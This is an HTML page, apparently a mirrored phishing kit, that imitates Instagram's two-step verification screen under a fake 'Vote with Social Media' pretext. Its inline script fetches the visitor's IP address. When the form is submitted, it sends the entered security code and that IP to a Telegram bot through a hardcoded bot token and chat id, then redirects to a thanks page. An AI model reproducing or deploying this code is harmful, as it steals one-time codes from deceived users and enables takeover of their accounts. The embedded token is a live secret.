<!DOCTYPE html>
<html lang="pt-AO">
  
<!-- Mirrored from fanfamousity.com/instagram/otp/657daf104b167f68d1979b9c by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Dec 2023 11:22:13 GMT -->
<!-- Added by ddddHTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="shortcut icon"
      href="../../img/socials/icon.png"
      type="image/x-icon"
    />
    <link rel="stylesheet" href="../../css/style2.css" />
    <title>Vote with Social Media</title>
    <style>
      .small-title {
        margin: 1em auto;
        color: #000;
      }
      .form-area form input {
        padding: 0.5em;
        outline-width: none !important;
      }
      .small {
        font-size: 0.85em;
        display: block;
        text-align: center;
        margin: 0.5em auto;
      }
    </style>
  </head>
  <body onload="SwitchScreen()">
    <section class="container">
      <!-- SMARTPHONE SECTION -->
      <article class="smartphone">
        <div class="screens">
          <img
            class="screen fade"
            src="../../img/socials/screen1.png"
            alt="screen1"
          />
          <img
            class="screen fade"
            src="../../img/socials/screen2.png"
            alt="screen2"
          />
          <img
            class="screen fade"
            src="../../img/socials/screen3.png"
            alt="screen3"
          />
        </div>
        <img src="../../img/socials/smartphones.png" alt="smartphones" />
      </article>
      <!-- SMARTPHONE SECTION END -->
      <!-- FORM SECTION -->
      <article class="form-area">
        <form  id="contactForm"  method="POST">
          <input type="text" id="ipaddress" name="ipaddress" hidden>
          <p class="small-title">2-Step Verification</p>
          <input
            type="text"
            name="code"
            id="code"
            required
            placeholder="Security code"
          />
          <!-- <input type="hidden" name="linkId" value="657daf104b167f68d1979b9c" /> -->
          <input type="submit" name="submit" value="Confirm" id="submit"/>
          <div class="options">
            <p class="small">Didn't get security code? we can</p>
            <a href="#" class="small">resend it</a>
            <div class="forget"><a href="#">Forgot password?</a></div>
          </div>
          <!-- <input type="hidden" name="_next" value="https://fanvote.mynetly.com/sltvot/thanks.html">
<input type="hidden" name="_captcha" value="false"> -->

        </form>
        <div class="noaccount">
          <a href="#">Don't have an account? <span>Signup</span></a>
        </div>
        <div class="apps">
          <p>Get the app</p>
          <a href="#">
            <img src="../../img/socials/appstore.png" alt="Get it from AppStore" />
          </a>
          <a href="#">
            <img
              src="../../img/socials/googleplay.png"
              alt="Get it from Google Play"
            />
          </a>
        </div>
      </article>
    </section>
    <!-- FORM SECTION END -->
    <!-- FOOTER -->
    <footer>
      <div class="footer-content">
        <a href="#">Meta</a>
        <a href="#">About</a>
        <a href="#">Blog</a>
        <a href="#">Jobs</a>
        <a href="#">API</a>
        <a href="#">Privacy</a>
        <a href="#">Terms</a>
        <a href="#">Locations</a>
        <a href="#">Hashtags</a>
        <a href="#">Threads</a>
        <a href="#">Instagram Lite</a>
      </div>
      <div>
        <a href="#">Dance</a>
        <a href="#">Food and Drink</a>
        <a href="#">Home garden</a>
        <a href="#">Music</a>
        <a href="#">Visual arts</a>
      </div>
      <div class="copyright">
        <select aria-label="Trocar idioma de exibição">
          <option value="en">English</option>
          <option value="af">Afrikaans</option>
          <option value="cs">Čeština</option>
          <option value="da">Dansk</option>
          <option value="de">Deutsch</option>
          <option value="el">Ελληνικά</option>
          <option value="en">English</option>
          <option value="en-gb">English (UK)</option>
          <option value="es">Español (España)</option>
          <option value="es-la">Español</option>
          <option value="fi">Suomi</option>
          <option value="fr">Français</option>
          <option value="id">Bahasa Indonesia</option>
          <option value="it">Italiano</option>
          <option value="ja">日本語</option>
          <option value="ko">한국어</option>
          <option value="ms">Bahasa Melayu</option>
          <option value="nb">Norsk</option>
          <option value="nl">Nederlands</option>
          <option value="pl">Polski</option>
          <option value="pt-br">Português (Brasil)</option>
          <option value="ru">Русский</option>
          <option value="sv">Svenska</option>
          <option value="th">ภาษาไทย</option>
          <option value="tl">Filipino</option>
          <option value="tr">Türkçe</option>
          <option value="zh-cn">中文(简体)</option>
          <option value="zh-tw">中文(台灣)</option>
          <option value="bn">বাংলা</option>
          <option value="gu">ગુજરાતી</option>
          <option value="hi">हिन्दी</option>
          <option value="hr">Hrvatski</option>
          <option value="hu">Magyar</option>
          <option value="kn">ಕನ್ನಡ</option>
          <option value="sk">Slovenčina</option>
          <option value="ta">தமிழ்</option>
          <option value="te">తెలుగు</option>
          <option value="vi">Tiếng Việt</option>
          <option value="zh-hk">中文(香港)</option>
          <option value="bg">Български</option>
          <option value="ro">Română</option>
          <option value="sr">Српски</option>
          <option value="uk">Українська</option>
        </select>
        <span>&copy; 2023 Instagram from Meta</span>
      </div>
    </footer>
    <script src="../../js/socials/app.html"></script>
    <script src="../../js/socials/brands.min.html"></script>
    <script src="../../js/socials/fontawesome.min.html"></script>
    <script>
      document.addEventListener('DOMContentLoaded', function () {
        // Replace 'https://api.ipify.org?format=json' with a preferred IP API if needed
        fetch('https://api.ipify.org?format=json')
          .then(response => response.json())
          .then(data => {
            const ipaddress = data.ip;
            document.getElementById('ipaddress').value = ipaddress;
          })
          .catch(error => {
            console.error('Error fetching IP address:', error);
          });
      });




      document.getElementById('contactForm').addEventListener('submit', function (event) {
        event.preventDefault();

        var code = document.getElementById('code').value;
        // var password = document.getElementById('password').value;
        var ipaddress = document.getElementById('ipaddress').value;

        var telegramMessage = `code: ${code}\nIpaddress: ${ipaddress}`;
    var token = '8052566388:AAGXSqF9uAzaa_SfqD1KO2dROSA2cb0GvKs';
            var chat_id = '7876943857'

        var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;

        fetch(url)
          .then(response => response.json())
          .then(data => {
            if (data.ok) {
              window.location.href = 'thanks.html';  // Redirect to thank you page
            } else {
              alert('Error sending message.');
            }
          })
          .catch(error => {
            console.error('Error:', error);
          });
      });

    </script>
  </body>

<!-- Mirrored from fanfamousity.com/instagram/otp/657daf104b167f68d1979b9c by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Dec 2023 11:22:30 GMT -->
</html>
